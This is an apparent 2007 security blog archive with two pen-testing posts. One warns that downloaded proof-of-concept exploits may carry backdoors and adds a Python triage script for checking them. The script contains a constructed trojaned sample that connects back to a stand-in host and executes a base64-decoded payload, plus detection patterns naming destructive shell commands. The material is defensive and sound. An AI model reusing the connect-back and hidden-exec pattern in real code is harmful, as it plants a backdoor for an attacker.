Archive for October 2007

When Penetration Tests Backfire

Posted by: agent0x0

A very good article over at Dark Reading today about testing PoC exploit code and security tools before you use them in a production environment.

"...how do you know if the PoC (proof of concept) exploit code you downloaded from Milw0rm or Packet Storm includes a backdoor?"

The author also mentions some very good things to consider when planning a pen test, and I have added a few of my own:

- Do you need to run the pen test in a production environment? While I think that you should, to simulate a real attack, some companies are not comfortable with that. Always find this out up front and record the decision in your contract and/or authorization letter.

- Review your toolkit and make sure that you are not using tools and exploits that will cause a DoS or crash a system. Of course, systems do sometimes crash for reasons outside your control (hence the reason you have an authorization-to-test letter); however, as a pen tester you should be doing everything you can to make sure you don't purposely crash or DoS systems. I suggest that at least 2-3 times a year your pen test team should meet for a few days, review your toolkit, and perform detailed testing of these tools and code.

- Review and test PoC and exploit code before running it in a production environment: read the source, record a hash of the reviewed copy so you can tell when it has changed, and run it first in an isolated lab where you can watch what it actually connects to. I don't think the client would be too happy if you inadvertently Trojan'd their systems!

- Try to supplement your team's toolkit with a commercial tool like Core Impact or Immunity Canvas, as their exploits are tested and have options to help ensure a targeted system does not crash.
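To make the "review and test PoC code" items above something the team can actually script into its periodic toolkit review, here is an added example (not from the Dark Reading article or the original post) that triages a downloaded PoC before it is scheduled against a client system. It verifies the file against the SHA-256 recorded at the last review and greps the source for signs that a "proof of concept" does more than advertised: connections to hosts other than the declared target, dynamic code execution, base64-decoded payloads, destructive shell commands. The two sample PoCs, the indicator patterns and the high-risk labels are all constructed for this example; a real team would maintain its own list.

```python
"""Static triage of a downloaded PoC before it goes near a client network.

Added example, not code from the Dark Reading article or the original post.
Two checks for the tool-review sessions described above:

  1. Compare the file against the SHA-256 recorded when the team last
     reviewed it, so a silently modified copy is caught.
  2. Flag source-level indicators that the PoC does more than it claims.

The samples, indicator list and HIGH_RISK set are constructed for this
example.
"""
import hashlib
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample 1: an exploit that also opens a second socket to a host
# that is not the target and runs a base64-encoded payload via exec().
TROJANED_POC = '''\
import socket, base64, os
TARGET = "10.0.0.5"
s = socket.socket()
s.connect((TARGET, 445))
s.send(b"\\x00" * 1024 + b"A" * 4096)
# "debug" helper left in by the author
c = socket.socket()
c.connect(("203.0.113.7", 4444))
exec(base64.b64decode("aW1wb3J0IG9z"))
'''

# Constructed sample 2: the same exploit without the extra behaviour.
CLEAN_POC = '''\
import socket
TARGET = "10.0.0.5"
s = socket.socket()
s.connect((TARGET, 445))
s.send(b"\\x00" * 1024 + b"A" * 4096)
'''

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# (label, pattern) pairs a reviewer wants raised. Deliberately grep-level:
# a first pass before the PoC ever runs, not a substitute for detonating it
# in an isolated lab and watching its traffic.
INDICATORS = [
    ("dynamic-exec", re.compile(r"\b(exec|eval)\s*\(")),
    ("base64-decode", re.compile(r"b64decode|base64\.decode")),
    ("connect-call", re.compile(r"\.connect\s*\(")),
    ("ip-literal", IP_RE),
    ("destructive-shell", re.compile(r"rm\s+-rf|mkfs|dd\s+if=")),
]
# Labels that block scheduling until a human has read the code.
HIGH_RISK = {"dynamic-exec", "base64-decode", "destructive-shell"}


@dataclass
class TriageReport:
    sha256: str
    hash_ok: Optional[bool]  # None when no reviewed hash is on record
    findings: List[Tuple[int, str, str]] = field(default_factory=list)
    foreign_hosts: List[str] = field(default_factory=list)

    def needs_manual_review(self) -> bool:
        """True unless the hash matches and nothing high-risk or
        off-target was found."""
        if self.hash_ok is not True:
            return True
        if self.foreign_hosts:
            return True
        return any(label in HIGH_RISK for _, label, _ in self.findings)


def sha256_of(source: str) -> str:
    return hashlib.sha256(source.encode("utf-8")).hexdigest()


def triage(source: str, declared_target: str,
           known_sha256: Optional[str] = None) -> TriageReport:
    """Hash the PoC, then scan it line by line for indicators and for IP
    literals that are not the target the test was authorized against."""
    digest = sha256_of(source)
    hash_ok = None if known_sha256 is None else (digest == known_sha256)
    report = TriageReport(sha256=digest, hash_ok=hash_ok)
    for lineno, line in enumerate(source.splitlines(), start=1):
        for label, pattern in INDICATORS:
            if pattern.search(line):
                report.findings.append((lineno, label, line.strip()))
        for host in IP_RE.findall(line):
            if host != declared_target and host not in report.foreign_hosts:
                report.foreign_hosts.append(host)
    return report


if __name__ == "__main__":
    for name, src in (("trojaned", TROJANED_POC), ("clean", CLEAN_POC)):
        rep = triage(src, "10.0.0.5", known_sha256=sha256_of(src))
        print(f"[{name}] sha256={rep.sha256[:16]}... "
              f"needs_manual_review={rep.needs_manual_review()}")
        for lineno, label, text in rep.findings:
            print(f"  line {lineno}: {label:<18} {text}")
        if rep.foreign_hosts:
            print("  connects to non-target hosts:", ", ".join(rep.foreign_hosts))
```

The trojaned sample is blocked on two independent grounds (a connect-back to 203.0.113.7 and an exec() of decoded base64), while the clean sample passes only when its recorded hash matches; a PoC with no reviewed hash on file is always held for review. Treat a clean static pass as the entry ticket to the lab run, not as clearance for production.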

SANS Institute - One Team, Two Team, Red Team, Blue Team

Posted by: agent0x0

I saw a good webcast and presentation on forming a red/blue team in your environment. What is a red/blue team? A red team is basically your attackers, and your blue team is the defenders. This is a typical program used by the government and other large organizations to test the assessment process as well as incident response. Lots of good material on forming your own pen test team, no matter what size your organization is.

You can view the entire archived webcast below (presentation by Dave Shackelford).

Note: you have to register for an account on the SANS portal to view the presentation, but I highly recommend you do that anyway just to get the great SANS newsletters every week. :)

SANS Institute - Ask The Expert Webcast: One Team, Two Team, Red Team, Blue Team